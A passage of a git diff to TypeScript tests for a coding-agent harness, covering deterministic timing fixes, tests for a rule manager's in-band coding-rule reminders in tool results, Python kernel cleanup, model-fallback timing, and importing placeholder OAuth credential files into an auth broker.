prompt guard", () => { // Start first prompt (don't await, it will block until abort) const firstPrompt = session.prompt("First message"); - // Wait a tick for isStreaming to be set - await Bun.sleep(10); - - // Verify we're streaming - expect(session.isStreaming).toBe(true); + await waitFor(() => session.isStreaming); // Second prompt should reject await expect(session.prompt("Second message")).rejects.toBeInstanceOf(AgentBusyError); @@ -129,7 +126,7 @@ describe("AgentSession concurrent prompt guard", () => { // Start first prompt const firstPrompt = session.prompt("First message"); - await Bun.sleep(10); + await waitFor(() => session.isStreaming); // steer should work while streaming expect(() => session.steer("Steering message")).not.toThrow(); @@ -145,7 +142,7 @@ describe("AgentSession concurrent prompt guard", () => { // Start first prompt const firstPrompt = session.prompt("First message"); - await Bun.sleep(10); + await waitFor(() => session.isStreaming); // followUp should work while streaming expect(() => session.followUp("Follow-up message")).not.toThrow(); @@ -293,6 +290,15 @@ describe("AgentSession TTSR resume gate", () => { } }); + async function waitFor(predicate: () => boolean, timeoutMs = 500): Promise<void> { + const deadline = Date.now() + timeoutMs; + while (Date.now() < deadline) { + if (predicate()) return; + await Bun.sleep(10); + } + + throw new Error("Timed out waiting for condition"); + } const testRule: Rule = { name: "no-unwrap", path: "/tmp/no-unwrap.md", @@ -322,18 +328,16 @@ describe("AgentSession TTSR resume gate", () => { } function pushContinuationStream(stream: AssistantMessageEventStream, onComplete: () => void): void { - setTimeout(() => { + queueMicrotask(() => { const partial = makeMsg(""); stream.push({ type: "start", partial }); - setTimeout(() => { - onComplete(); - stream.push({ - type: "done", - reason: "stop", - message: makeMsg('Fixed: let val = result.expect("msg")'), - }); - }, 80); - }, 10); + onComplete(); + stream.push({ + type: "done", + reason: "stop", + message: makeMsg('Fixed: let val = result.expect("msg")'), + }); + }); } function pushAbortableTtsrStream(stream: AssistantMessageEventStream, signal: AbortSignal | undefined): void { @@ -346,19 +350,19 @@ describe("AgentSession TTSR resume gate", () => { delta: "let val = result.unwrap(", partial: makeMsg("let val = result.unwrap("), }); - // TTSR abort should fire synchronously; poll for it - const checkAbort = () => { - if (signal?.aborted) { - stream.push({ - type: "error", - reason: "aborted", - error: makeMsg("let val = result.unwrap(", "aborted"), - }); - } else { - setTimeout(checkAbort, 2); - } - }; - checkAbort(); + if (signal) { + signal.addEventListener( + "abort", + () => { + stream.push({ + type: "error", + reason: "aborted", + error: makeMsg("let val = result.unwrap(", "aborted"), + }); + }, + { once: true }, + ); + } }); } @@ -525,18 +529,19 @@ describe("AgentSession TTSR resume gate", () => { delta: "result.unwrap(", partial: makeMsg("result.unwrap("), }); - const checkAbort = () => { - if (signal?.aborted) { - stream.push({ - type: "error", - reason: "aborted", - error: makeMsg("result.unwrap(", "aborted"), - }); - } else { - setTimeout(checkAbort, 2); - } - }; - checkAbort(); + if (signal) { + signal.addEventListener( + "abort", + () => { + stream.push({ + type: "error", + reason: "aborted", + error: makeMsg("result.unwrap(", "aborted"), + }); + }, + { once: true }, + ); + } }); return stream; @@ -560,9 +565,7 @@ describe("AgentSession TTSR resume gate", () => { // Start prompt (will trigger TTSR and create resume gate) const promptPromise = session.prompt("Write some Rust code"); - - // Wait for TTSR abort to be pending - await Bun.sleep(20); + await waitFor(() => session.isStreaming); // Abort session — prompt() should unblock await session.abort(); @@ -592,7 +595,6 @@ describe("AgentSession TTSR resume gate", () => { description: "A mock edit tool", parameters: z.object({}), execute: async () => { - await Bun.sleep(100); toolExecutionFinished = true; return { content: [{ type: "text" as const, text: "edit applied" }] }; }, @@ -638,19 +640,19 @@ describe("AgentSession TTSR resume gate", () => { pushAbortableTtsrStream(stream, signal); } else if (streamCallCount === 2) { // Continuation: return assistant message with a tool call - setTimeout(() => { + queueMicrotask(() => { const msg = makeToolCallMsg(); stream.push({ type: "start", partial: msg }); stream.push({ type: "done", reason: "toolUse", message: msg }); - }, 10); + }); } else { // After tool execution: return final response - setTimeout(() => { + queueMicrotask(() => { allTurnsCompleted = true; const msg = makeMsg('Fixed: let val = result.expect("msg")'); stream.push({ type: "start", partial: msg }); stream.push({ type: "done", reason: "stop", message: msg }); - }, 10); + }); } return stream; @@ -683,6 +685,255 @@ describe("AgentSession TTSR resume gate", () => { expect(streamCallCount).toBeGreaterThanOrEqual(3); expect(session.isStreaming).toBe(false); }); + it("interruptMode never folds tool-match reminder into the toolResult instead of driving an extra turn", async () => { + const model = getBundledModel("anthropic", "claude-sonnet-4-5")!; + let streamCallCount = 0; + let toolExecuted = false; + + const ttsrManager = new TtsrManager({ + enabled: true, + contextMode: "discard", + interruptMode: "never", + repeatMode: "once", + repeatGap: 10, + }); + ttsrManager.addRule(testRule); + + const mockTool: AgentTool = { + name: "mock_edit", + label: "Mock Edit", + description: "A mock edit tool", + parameters: z.object({ snippet: z.string().optional() }), + execute: async () => { + toolExecuted = true; + return { content: [{ type: "text" as const, text: "edit applied" }] }; + }, + }; + + const toolCallContent: ToolCall = { + type: "toolCall", + id: "call_never_001", + name: "mock_edit", + arguments: { snippet: "let val = result.unwrap()" }, + }; + + const makeToolCallMsg = (): AssistantMessage => ({ + role: "assistant", + content: [toolCallContent], + api: "anthropic-messages", + provider: "anthropic", + model: "mock", + usage: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + totalTokens: 0, + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, + }, + stopReason: "toolUse", + timestamp: Date.now(), + }); + + const agent = new Agent({ + getApiKey: () => "test-key", + initialState: { model, systemPrompt: ["Test"], tools: [mockTool] }, + streamFn: () => { + streamCallCount++; + const stream = new AssistantMessageEventStream(); + if (streamCallCount === 1) { + // Emit a tool call whose argument delta matches the TTSR rule. + queueMicrotask(() => { + const partial = makeToolCallMsg(); + stream.push({ type: "start", partial }); + stream.push({ type: "toolcall_start", contentIndex: 0, partial }); + stream.push({ + type: "toolcall_delta", + contentIndex: 0, + delta: 'let val = result.unwrap("oops")', + partial, + }); + stream.push({ type: "toolcall_end", contentIndex: 0, toolCall: toolCallContent, partial }); + stream.push({ type: "done", reason: "toolUse", message: partial }); + }); + } else { + // Continuation after tool result; finish cleanly. + queueMicrotask(() => { + const done = makeMsg("ok"); + stream.push({ type: "start", partial: done }); + stream.push({ type: "done", reason: "stop", message: done }); + }); + } + return stream; + }, + }); + + const sessionManager = SessionManager.inMemory(); + const settings = Settings.isolated(); + const authStorage = await AuthStorage.create(path.join(tempDir, "testauth-never-tool.db")); + authStorages.push(authStorage); + const modelRegistry = new ModelRegistry(authStorage, path.join(tempDir, "models.yml")); + authStorage.setRuntimeApiKey("anthropic", "test-key"); + + session = new AgentSession({ + agent, + sessionManager, + settings, + modelRegistry, + ttsrManager, + }); + + await session.prompt("Write some Rust code"); + + // Tool ran (no interrupt) and the loop didn't spawn an extra follow-up turn for injection. + expect(toolExecuted).toBe(true); + expect(streamCallCount).toBe(2); + + // The matched tool's result must carry the in-band reminder. + const toolResult = agent.state.messages.find( + (m): m is Extract<typeof m, { role: "toolResult" }> => + m.role === "toolResult" && m.toolCallId === toolCallContent.id, + ); + expect(toolResult).toBeDefined(); + const text = Array.isArray(toolResult?.content) + ? toolResult.content + .filter((c): c is { type: "text"; text: string } => c.type === "text") + .map(c => c.text) + .join("\n") + : ""; + expect(text).toContain("<system-reminder"); + expect(text).toContain('rule="no-unwrap"'); + expect(text).toContain("Do not use .unwrap()"); + expect(text.indexOf("<system-reminder")).toBeLessThan(text.indexOf("edit applied")); + }); + + it("interruptMode never deduplicates the reminder across sibling tool calls in one batch", async () => { + const model = getBundledModel("anthropic", "claude-sonnet-4-5")!; + let streamCallCount = 0; + let executedCount = 0; + + const ttsrManager = new TtsrManager({ + enabled: true, + contextMode: "discard", + interruptMode: "never", + repeatMode: "once", + repeatGap: 10, + }); + ttsrManager.addRule(testRule); + + const mockTool: AgentTool = { + name: "mock_edit", + label: "Mock Edit", + description: "A mock edit tool", + parameters: z.object({ snippet: z.string().optional() }), + execute: async () => { + executedCount++; + return { content: [{ type: "text" as const, text: "edit applied" }] }; + }, + }; + + const toolCallA: ToolCall = { + type: "toolCall", + id: "call_dup_A", + name: "mock_edit", + arguments: { snippet: "a.unwrap()" }, + }; + const toolCallB: ToolCall = { + type: "toolCall", + id: "call_dup_B", + name: "mock_edit", + arguments: { snippet: "b.unwrap()" }, + }; + const toolCallC: ToolCall = { + type: "toolCall", + id: "call_dup_C", + name: "mock_edit", + arguments: { snippet: "c.unwrap()" }, + }; + + const makeBatchMsg = (): AssistantMessage => ({ + role: "assistant", + content: [toolCallA, toolCallB, toolCallC], + api: "anthropic-messages", + provider: "anthropic", + model: "mock", + usage: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + totalTokens: 0, + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, + }, + stopReason: "toolUse", + timestamp: Date.now(), + }); + + const agent = new Agent({ + getApiKey: () => "test-key", + initialState: { model, systemPrompt: ["Test"], tools: [mockTool] }, + streamFn: () => { + streamCallCount++; + const stream = new AssistantMessageEventStream(); + if (streamCallCount === 1) { + queueMicrotask(() => { + const partial = makeBatchMsg(); + stream.push({ type: "start", partial }); + const calls: ToolCall[] = [toolCallA, toolCallB, toolCallC]; + for (let i = 0; i < calls.length; i++) { + const call = calls[i]!; + stream.push({ type: "toolcall_start", contentIndex: i, partial }); + stream.push({ + type: "toolcall_delta", + contentIndex: i, + delta: `let val = result.unwrap("oops-${call.id}")`, + partial, + }); + stream.push({ type: "toolcall_end", contentIndex: i, toolCall: call, partial }); + } + stream.push({ type: "done", reason: "toolUse", message: partial }); + }); + } else { + queueMicrotask(() => { + const done = makeMsg("ok"); + stream.push({ type: "start", partial: done }); + stream.push({ type: "done", reason: "stop", message: done }); + }); + } + return stream; + }, + }); + + const sessionManager = SessionManager.inMemory(); + const settings = Settings.isolated(); + const authStorage = await AuthStorage.create(path.join(tempDir, "testauth-dup.db")); + authStorages.push(authStorage); + const modelRegistry = new ModelRegistry(authStorage, path.join(tempDir, "models.yml")); + authStorage.setRuntimeApiKey("anthropic", "test-key"); + + session = new AgentSession({ + agent, + sessionManager, + settings, + modelRegistry, + ttsrManager, + }); + + await session.prompt("Write some Rust code"); + + expect(executedCount).toBe(3); + const toolResults = agent.state.messages.filter( + (m): m is Extract<typeof m, { role: "toolResult" }> => m.role === "toolResult", + ); + expect(toolResults).toHaveLength(3); + const withReminder = toolResults.filter(r => + Array.isArray(r.content) + ? r.content.some(c => c.type === "text" && c.text.includes("<system-reminder")) + : false, + ); + expect(withReminder).toHaveLength(1); + }); + it("prompt() waits for context-promotion continuation to finish", async () => { const authStorage = await AuthStorage.create(path.join(tempDir, "testauth-promo.db")); authStorages.push(authStorage); @@ -748,12 +999,12 @@ describe("AgentSession TTSR resume gate", () => { stream.push({ type: "error", reason: "error", error: message }); }); } else { - setTimeout(() => { + queueMicrotask(() => { continuationCompleted = true; const message = makeSuccessMessage(); stream.push({ type: "start", partial: message }); stream.push({ type: "done", reason: "stop", message }); - }, 80); + }); } return stream; }, diff --git a/packages/coding-agent/test/agent-session-python-cleanup.test.ts b/packages/coding-agent/test/agent-session-python-cleanup.test.ts index a5f74face..126d8051b 100644 --- a/packages/coding-agent/test/agent-session-python-cleanup.test.ts +++ b/packages/coding-agent/test/agent-session-python-cleanup.test.ts @@ -1,4 +1,4 @@ -import { afterEach, describe, expect, it, vi } from "bun:test"; +import { afterEach, beforeEach, describe, expect, it, vi } from "bun:test"; import * as fs from "node:fs"; import * as os from "node:os"; import * as path from "node:path"; @@ -8,7 +8,7 @@ import * as pythonExecutor from "@oh-my-pi/pi-coding-agent/eval/py/executor"; import type { PythonKernel as PythonKernelInstance } from "@oh-my-pi/pi-coding-agent/eval/py/kernel"; import * as pythonKernel from "@oh-my-pi/pi-coding-agent/eval/py/kernel"; import { AgentRegistry } from "@oh-my-pi/pi-coding-agent/registry/agent-registry"; -import { createAgentSession, type ExtensionFactory } from "@oh-my-pi/pi-coding-agent/sdk"; +import { createAgentSession, type ExtensionFactory, type WorkspaceTree } from "@oh-my-pi/pi-coding-agent/sdk"; import { SessionManager } from "@oh-my-pi/pi-coding-agent/session/session-manager"; import { Snowflake } from "@oh-my-pi/pi-utils"; @@ -75,6 +75,23 @@ const createTempProject = () => { return { tempDir, cwd }; }; +const emptyWorkspaceTree = (cwd: string): WorkspaceTree => ({ + rootPath: cwd, + rendered: ".", + truncated: false, + totalLines: 1, + agentsMdFiles: [], +}); + +const mockPositiveSleepsImmediate = () => { + const realSleep = Bun.sleep.bind(Bun); + return vi.spyOn(Bun, "sleep").mockImplementation((duration?: number | Date) => { + if (typeof duration === "number" && duration > 0) { + return Promise.resolve(); + } + return realSleep(duration ?? 0); + }); +}; const createSession = async ( tempDir: string, cwd: string, @@ -92,6 +109,7 @@ const createSession = async ( skills: [], contextFiles: [], promptTemplates: [], + workspaceTree: emptyWorkspaceTree(cwd), slashCommands: [], enableMCP: false, enableLsp: false, @@ -117,8 +135,20 @@ const createMockKernel = () => { describe("AgentSession python cleanup", () => { const tempDirs: string[] = []; + let originalNullPrompt: string | undefined; + + beforeEach(() => { + originalNullPrompt = Bun.env.NULL_PROMPT; + Bun.env.NULL_PROMPT = "true"; + }); afterEach(async () => { + if (originalNullPrompt === undefined) { + delete Bun.env.NULL_PROMPT; + } else { + Bun.env.NULL_PROMPT = originalNullPrompt; + } + originalNullPrompt = undefined; vi.restoreAllMocks(); await pythonExecutor.disposeAllKernelSessions(); for (const tempDir of tempDirs.splice(0)) { @@ -162,6 +192,7 @@ describe("AgentSession python cleanup", () => { enableMCP: false, enableLsp: false, toolNames: ["eval"], + workspaceTree: emptyWorkspaceTree(cwd), }), ).rejects.toThrow("Extension init failed"); @@ -227,6 +258,7 @@ describe("AgentSession python cleanup", () => { enableMCP: false, enableLsp: false, toolNames: ["eval"], + workspaceTree: emptyWorkspaceTree(cwd), agentRegistry: throwingRegistry, }), ).rejects.toThrow("Agent registry failed"); @@ -369,24 +401,22 @@ describe("AgentSession python cleanup", () => { expect(EvalTool).toBeDefined(); let toolExecutionSettled = false; const toolExecution = EvalTool! - .execute("call-id", { input: "```py\nprint('tool')\n```" }, undefined, undefined, undefined) + .execute("call-id", { cells: [{ language: "py", code: "print('tool')" }] }, undefined, undefined, undefined) .finally(() => { toolExecutionSettled = true; }); await blockedExecuteStarted.promise; + const sleepSpy = mockPositiveSleepsImmediate(); let disposed = false; const disposeSession = session.dispose().then(() => { disposed = true; }); - await Bun.sleep(0); - - expect(disposed).toBe(false); - expect(toolExecutionSettled).toBe(false); - expect(executeSpy).toHaveBeenCalledTimes(1); const [toolResult] = await Promise.all([toolExecution, disposeSession]); + expect(sleepSpy).toHaveBeenCalledWith(3000); + expect(disposed).toBe(true); expect(toolExecutionSettled).toBe(true); expect(executeSpy).toHaveBeenCalledTimes(1); @@ -408,6 +438,8 @@ describe("AgentSession python cleanup", () => { kernel.abortBlockedExecution = false; vi.spyOn(pythonKernel, "checkPythonKernelAvailability").mockResolvedValue({ ok: true }); + const sleepSpy = vi.spyOn(Bun, "sleep").mockResolvedValue(undefined); + const startSpy = vi .spyOn(pythonKernel.PythonKernel, "start") .mockResolvedValue(kernel as unknown as PythonKernelInstance); @@ -428,6 +460,7 @@ describe("AgentSession python cleanup", () => { firstDisposed = true; }); await disposeFirst; + expect(sleepSpy).toHaveBeenCalledWith(3000); expect(firstDisposed).toBe(true); expect(firstExecutionSettled).toBe(false); @@ -594,7 +627,13 @@ describe("AgentSession python cleanup", () => { expect(EvalTool).toBeDefined(); const disposeSession = session.dispose(); await expect( - EvalTool!.execute("call-id", { input: "```py\nprint('late')\n```" }, undefined, undefined, undefined), + EvalTool!.execute( + "call-id", + { cells: [{ language: "py", code: "print('late')" }] }, + undefined, + undefined, + undefined, + ), ).rejects.toThrow("Python execution is unavailable while session disposal is in progress"); await disposeSession; expect(executeSpy).not.toHaveBeenCalled(); @@ -629,7 +668,7 @@ describe("AgentSession python cleanup", () => { expect(EvalTool).toBeDefined(); const execution = EvalTool!.execute( "call-id", - { input: "```py\nprint('late after artifact')\n```" }, + { cells: [{ language: "py", code: "print('late after artifact')" }] }, undefined, undefined, undefined, @@ -660,9 +699,10 @@ describe("AgentSession python cleanup", () => { const firstExecution = session.executePython("print('first')"); await blockedExecutionStarted.promise; const secondExecution = session.executePython("print('second')"); - await Bun.sleep(0); + const sleepSpy = mockPositiveSleepsImmediate(); await session.dispose(); + expect(sleepSpy).toHaveBeenCalledWith(3000); const [firstResult, secondResult] = await Promise.all([firstExecution, secondExecution]); expect(firstResult.cancelled).toBe(true); diff --git a/packages/coding-agent/test/agent-session-retry-fallback.test.ts b/packages/coding-agent/test/agent-session-retry-fallback.test.ts index 18026c28c..2df771f09 100644 --- a/packages/coding-agent/test/agent-session-retry-fallback.test.ts +++ b/packages/coding-agent/test/agent-session-retry-fallback.test.ts @@ -1,4 +1,4 @@ -import { afterEach, beforeEach, describe, expect, it } from "bun:test"; +import { afterEach, beforeEach, describe, expect, it, vi } from "bun:test"; import * as path from "node:path"; import { Agent } from "@oh-my-pi/pi-agent-core"; import { type AssistantMessage, Effort, getBundledModel, type Model, writeModelCache } from "@oh-my-pi/pi-ai"; @@ -83,6 +83,7 @@ describe("AgentSession retry fallback", () => { } authStorage.close(); tempDir.removeSync(); + vi.restoreAllMocks(); }); it("advances through a role-keyed fallback chain across retries", async () => { @@ -569,6 +570,8 @@ describe("AgentSession retry fallback", () => { settings, modelRegistry, }); + let now = Date.now(); + vi.spyOn(Date, "now").mockImplementation(() => now); await session.prompt("First prompt triggers fallback"); await session.waitForIdle(); @@ -589,7 +592,7 @@ describe("AgentSession retry fallback", () => { expect(session.model?.provider).toBe(fallbackModel.provider); expect(session.model?.id).toBe(fallbackModel.id); - await Bun.sleep(240); + now += 240; await session.prompt("Third prompt should lazily revert to primary"); await session.waitForIdle(); expect(requestedModels).toEqual([ @@ -629,6 +632,8 @@ describe("AgentSession retry fallback", () => { modelRegistry, thinkingLevel: Effort.High, }); + let now = Date.now(); + vi.spyOn(Date, "now").mockImplementation(() => now); await session.prompt("First prompt triggers bare-selector fallback"); await session.waitForIdle(); @@ -641,7 +646,7 @@ describe("AgentSession retry fallback", () => { expect(session.thinkingLevel).toBeUndefined(); session.setThinkingLevel(Effort.Low); - await Bun.sleep(240); + now += 240; await session.prompt("Second prompt should restore model but preserve user thinking change"); await session.waitForIdle(); expect(requestedModels).toEqual([ @@ -671,7 +676,7 @@ describe("AgentSession retry fallback", () => { contextWindow: 1_000_000, maxTokens: 384_000, }; - writeModelCache("ollama-cloud", Date.now(), [cachedModel], true, path.join(tempDir.path(), "models.db")); + writeModelCache("ollama-cloud", Date.now(), [cachedModel], true, "", path.join(tempDir.path(), "models.db")); modelRegistry = new ModelRegistry(authStorage, path.join(tempDir.path(), "models.json")); const settings = Settings.isolated({ diff --git a/packages/coding-agent/test/auth-broker-import.test.ts b/packages/coding-agent/test/auth-broker-import.test.ts new file mode 100644 index 000000000..877210325 --- /dev/null +++ b/packages/coding-agent/test/auth-broker-import.test.ts @@ -0,0 +1,303 @@ +import { afterEach, beforeEach, describe, expect, test } from "bun:test"; +import * as fs from "node:fs/promises"; +import * as os from "node:os"; +import * as path from "node:path"; +import { type AuthBrokerServerHandle, AuthStorage, SqliteAuthCredentialStore, startAuthBroker } from "@oh-my-pi/pi-ai"; +import { getAgentDbPath, setAgentDir } from "@oh-my-pi/pi-utils"; +import { runAuthBrokerCommand } from "../src/cli/auth-broker-cli"; + +const ORIGINAL_STDOUT_WRITE = process.stdout.write.bind(process.stdout); + +function silenceStdout(): () => string { + let captured = ""; + process.stdout.write = ((chunk: string | Uint8Array): boolean => { + captured += typeof chunk === "string" ? chunk : new TextDecoder().decode(chunk); + return true; + }) as typeof process.stdout.write; + return () => captured; +} + +describe("auth-broker import (CLIProxyAPI)", () => { + let agentDir = ""; + let cliproxyDir = ""; + let originalAgentDir: string | undefined; + + beforeEach(async () => { + originalAgentDir = process.env.OMP_AGENT_DIR; + agentDir = await fs.mkdtemp(path.join(os.tmpdir(), "omp-import-agent-")); + cliproxyDir = await fs.mkdtemp(path.join(os.tmpdir(), "omp-import-cliproxy-")); + setAgentDir(agentDir); + }); + + afterEach(async () => { + process.stdout.write = ORIGINAL_STDOUT_WRITE; + if (originalAgentDir === undefined) delete process.env.OMP_AGENT_DIR; + else process.env.OMP_AGENT_DIR = originalAgentDir; + await fs.rm(agentDir, { recursive: true, force: true }); + await fs.rm(cliproxyDir, { recursive: true, force: true }); + }); + + async function writeCliProxyJson(name: string, body: Record<string, unknown>): Promise<string> { + const file = path.join(cliproxyDir, name); + await Bun.write(file, JSON.stringify(body)); + return file; + } + + test("imports a directory of CLIProxyAPI JSONs and maps types to omp providers", async () => { + await writeCliProxyJson("claude-sample.json", { + type: "claude", + access_token: "claude-access-1", + refresh_token: "claude-refresh-1", + expired: "2099-12-31T23:59:59Z", + email: "claude-user@example.com", + id_token: "ignored", + last_refresh: "2025-01-01T00:00:00Z", + }); + await writeCliProxyJson("codex-sample.json", { + type: "codex", + access_token: "codex-access-1", + refresh_token: "codex-refresh-1", + expired: "2099-12-31T23:59:59Z", + email: "codex-user@example.com", + account_id: "acct-codex-1", + websockets: true, + }); + await writeCliProxyJson("disabled.json", { + type: "claude", + access_token: "x", + refresh_token: "y", + expired: "2099-12-31T23:59:59Z", + email: "disabled@example.com", + disabled: true, + }); + + const restore = silenceStdout(); + await runAuthBrokerCommand({ + action: "import", + flags: { source: cliproxyDir, json: false }, + }); + restore(); + + const store = await SqliteAuthCredentialStore.open(getAgentDbPath()); + try { + const claude = store.listAuthCredentials("anthropic"); + expect(claude).toHaveLength(1); + expect(claude[0].credential.type).toBe("oauth"); + if (claude[0].credential.type === "oauth") { + expect(claude[0].credential.access).toBe("claude-access-1"); + expect(claude[0].credential.refresh).toBe("claude-refresh-1"); + expect(claude[0].credential.email).toBe("claude-user@example.com"); + expect(claude[0].credential.expires).toBe(Date.parse("2099-12-31T23:59:59Z")); + } + + const codex = store.listAuthCredentials("openai-codex"); + expect(codex).toHaveLength(1); + if (codex[0].credential.type === "oauth") { + expect(codex[0].credential.access).toBe("codex-access-1"); + expect(codex[0].credential.accountId).toBe("acct-codex-1"); + } + + // disabled.json was skipped by default + const disabled = store + .listAuthCredentials("anthropic") + .find(r => r.credential.type === "oauth" && r.credential.email === "disabled@example.com"); + expect(disabled).toBeUndefined(); + } finally { + store.close(); + } + }); + + test("dry-run does not write any credentials", async () => { + await writeCliProxyJson("claude.json", { + type: "claude", + access_token: "a", + refresh_token: "b", + expired: "2099-12-31T23:59:59Z", + email: "dryrun@example.com", + }); + + const restore = silenceStdout(); + await runAuthBrokerCommand({ + action: "import", + flags: { source: cliproxyDir, dryRun: true, json: true }, + }); + const output = restore(); + + const store = await SqliteAuthCredentialStore.open(getAgentDbPath()); + try { + expect(store.listAuthCredentials()).toHaveLength(0); + } finally { + store.close(); + } + const parsed = JSON.parse(output.trim().split("\n").pop() ?? "{}"); + expect(parsed.dryRun).toBe(true); + expect(parsed.plan).toHaveLength(1); + expect(parsed.plan[0].provider).toBe("anthropic"); + }); + + test("--provider override forces a provider id when the JSON type is unrecognized", async () => { + await writeCliProxyJson("weird.json", { + type: "some-future-type", + access_token: "z", + refresh_token: "w", + expired: "2099-12-31T23:59:59Z", + email: "future@example.com", + }); + + const restore = silenceStdout(); + await runAuthBrokerCommand({ + action: "import", + flags: { source: cliproxyDir, provider: "anthropic" }, + }); + restore(); + + const store = await SqliteAuthCredentialStore.open(getAgentDbPath()); + try { + const rows = store.listAuthCredentials("anthropic"); + expect(rows).toHaveLength(1); + } finally { + store.close(); + } + }); + + test("--include-disabled imports rows marked disabled", async () => { + await writeCliProxyJson("disabled.json", { + type: "claude", + access_token: "d", + refresh_token: "e", + expired: "2099-12-31T23:59:59Z", + email: "disabled-import@example.com", + disabled: true, + }); + + const restore = silenceStdout(); + await runAuthBrokerCommand({ + action: "import", + flags: { source: cliproxyDir, includeDisabled: true }, + }); + restore(); + + const store = await SqliteAuthCredentialStore.open(getAgentDbPath()); + try { + expect(store.listAuthCredentials("anthropic")).toHaveLength(1); + } finally { + store.close(); + } + }); +}); + +describe("auth-broker import (broker-routed)", () => { + let agentDir = ""; + let brokerAgentDir = ""; + let cliproxyDir = ""; + let brokerStore: SqliteAuthCredentialStore | undefined; + let brokerStorage: AuthStorage | undefined; + let handle: AuthBrokerServerHandle | undefined; + const token = "broker-import-bearer"; + const savedEnv: Record<string, string | undefined> = {}; + + beforeEach(async () => { + savedEnv.OMP_AUTH_BROKER_URL = process.env.OMP_AUTH_BROKER_URL; + savedEnv.OMP_AUTH_BROKER_TOKEN = process.env.OMP_AUTH_BROKER_TOKEN; + agentDir = await fs.mkdtemp(path.join(os.tmpdir(), "omp-import-client-")); + brokerAgentDir = await fs.mkdtemp(path.join(os.tmpdir(), "omp-import-broker-")); + cliproxyDir = await fs.mkdtemp(path.join(os.tmpdir(), "omp-import-cliproxy-broker-")); + setAgentDir(agentDir); + + brokerStore = await SqliteAuthCredentialStore.open(path.join(brokerAgentDir, "agent.db")); + brokerStorage = new AuthStorage(brokerStore); + await brokerStorage.reload(); + handle = startAuthBroker({ + storage: brokerStorage, + bind: "127.0.0.1:0", + bearerTokens: [token], + disableRefresher: true, + }); + process.env.OMP_AUTH_BROKER_URL = handle.url; + process.env.OMP_AUTH_BROKER_TOKEN = token; + }); + + afterEach(async () => { + await handle?.close(); + brokerStorage?.close(); + brokerStore?.close(); + await fs.rm(agentDir, { recursive: true, force: true }); + await fs.rm(brokerAgentDir, { recursive: true, force: true }); + await fs.rm(cliproxyDir, { recursive: true, force: true }); + for (const key of ["OMP_AUTH_BROKER_URL", "OMP_AUTH_BROKER_TOKEN"] as const) { + if (savedEnv[key] === undefined) delete process.env[key]; + else process.env[key] = savedEnv[key]; + } + }); + + test("uploads CLIProxyAPI JSONs to the broker when configured, not the local store", async () => { + await Bun.write( + path.join(cliproxyDir, "claude-foo@bar.json"), + JSON.stringify({ + type: "claude", + access_token: "broker-access", + refresh_token: "broker-refresh-real", + expired: "2099-12-31T23:59:59Z", + email: "foo@bar.com", + }), + ); + + const ORIGINAL_STDOUT = process.stdout.write.bind(process.stdout); + let captured = ""; + process.stdout.write = ((chunk: string | Uint8Array): boolean => { + captured += typeof chunk === "string" ? chunk : new TextDecoder().decode(chunk); + return true; + }) as typeof process.stdout.write; + try { + await runAuthBrokerCommand({ + action: "import", + flags: { source: cliproxyDir }, + }); + } finally { + process.stdout.write = ORIGINAL_STDOUT; + } + + // The broker received it (and persisted the real refresh token). + const persisted = brokerStore!.getOAuth("anthropic"); + expect(persisted?.access).toBe("broker-access"); + expect(persisted?.refresh).toBe("broker-refresh-real"); + expect(persisted?.email).toBe("foo@bar.com"); + + // The local client SQLite store was NOT touched. + const localStore = await SqliteAuthCredentialStore.open(getAgentDbPath()); + try { + expect(localStore.listAuthCredentials()).toHaveLength(0); + } finally { + localStore.close(); + } + + expect(captured).toContain("uploaded"); + expect(captured).toContain(handle!.url); + }); + + test("dry-run does not upload even when broker is configured", async () => { + await Bun.write( + path.join(cliproxyDir, "claude-dry.json"), + JSON.stringify({ + type: "claude", + access_token: "a", + refresh_token: "b", + expired: "2099-12-31T23:59:59Z", + email: "dry@example.com", + }), + ); + + const ORIGINAL_STDOUT = process.stdout.write.bind(process.stdout); + process.stdout.write = (() => true) as typeof process.stdout.write; + try { + await runAuthBrokerCommand({ + action: "import", + flags: { source: cliproxyDir, dryRun: true }, + }); + } finally { + process.stdout.write = ORIGINAL_STDOUT; + } + + expect(brokerStore!.listAuthCredentials()).toHaveLength(0); + }); +}); diff --git a/packages/coding-agent/test/bash-acp-terminal.test.ts b/packages/coding-agent/test/bash-acp-terminal.test.ts index d97115e70..0323dec17 100644 --- a/packages/coding-agent/test/bash-acp-terminal.test.ts +++ b/packages/coding-agent/test/bash-acp-terminal.test.ts @@ -1,4 +1,4 @@ -import { describe, expect, it, spyOn } from "bun:test"; +import { afterEach, describe, expect, it, mock, spyOn } from "bun:test"; import type { ClientBridge, ClientBridgeTerminalHandle } from "../src/session/client-bridge"; import type { ToolSession } from "../src/tools"; import { BashTool } from "../src/tools/bash"; @@ -29,6 +29,10 @@ function makeSession(bridge: ClientBridge): ToolSession { } as unknown as ToolSession; } +afterEach(() => { + mock.restore(); +}); + describe("BashTool ACP terminal routing", () => { it("routes through bridge, emits terminalId update, and releases the handle", async () => { const stubText = "hello from terminal\n"; @@ -140,6 +144,8 @@ describe("BashTool ACP terminal routing", () => { const killSpy = spyOn(handle, "kill"); const releaseSpy = spyOn(handle, "release"); + spyOn(Bun, "sleep").mockImplementation(async () => {}); + const tool = new BashTool(makeSession(bridge)); await expect(tool.execute("call-timeout", { command: "sleep 60", timeout: 1 })).rejects.toThrow( diff --git a/packages/coding-agent/test/bash-execution-sixel.test.ts b/packages/coding-agent/test/bash-execution-sixel.test.ts index 544da68b3..66de8df0f 100644 --- a/packages/coding-agent/test/bash-execution-sixel.test.ts +++ b/packages/coding-agent/test/bash-execution-sixel.test.ts @@ -2,8 +2,8 @@ import { afterEach, beforeEach, describe, expect, it } from "bun:test"; import { BashExecutionComponent } from "@oh-my-pi/pi-coding-agent/modes/components/bash-execution"; import { getThemeByName, setThemeInstance } from "@oh-my-pi/pi-coding-agent/modes/theme/theme"; import { sanitizeWithOptionalSixelPassthrough } from "@oh-my-pi/pi-coding-agent/utils/sixel"; -import { sanitizeText } from "@oh-my-pi/pi-natives"; import type { TUI } from "@oh-my-pi/pi-tui"; +import { sanitizeText } from "@oh-my-pi/pi-utils"; const SIXEL = "\x1bPqabc\x1b\\"; diff --git a/packages/coding-agent/test/bash-executor.test.ts b/packages/coding-agent/test/bash-executor.test.ts index 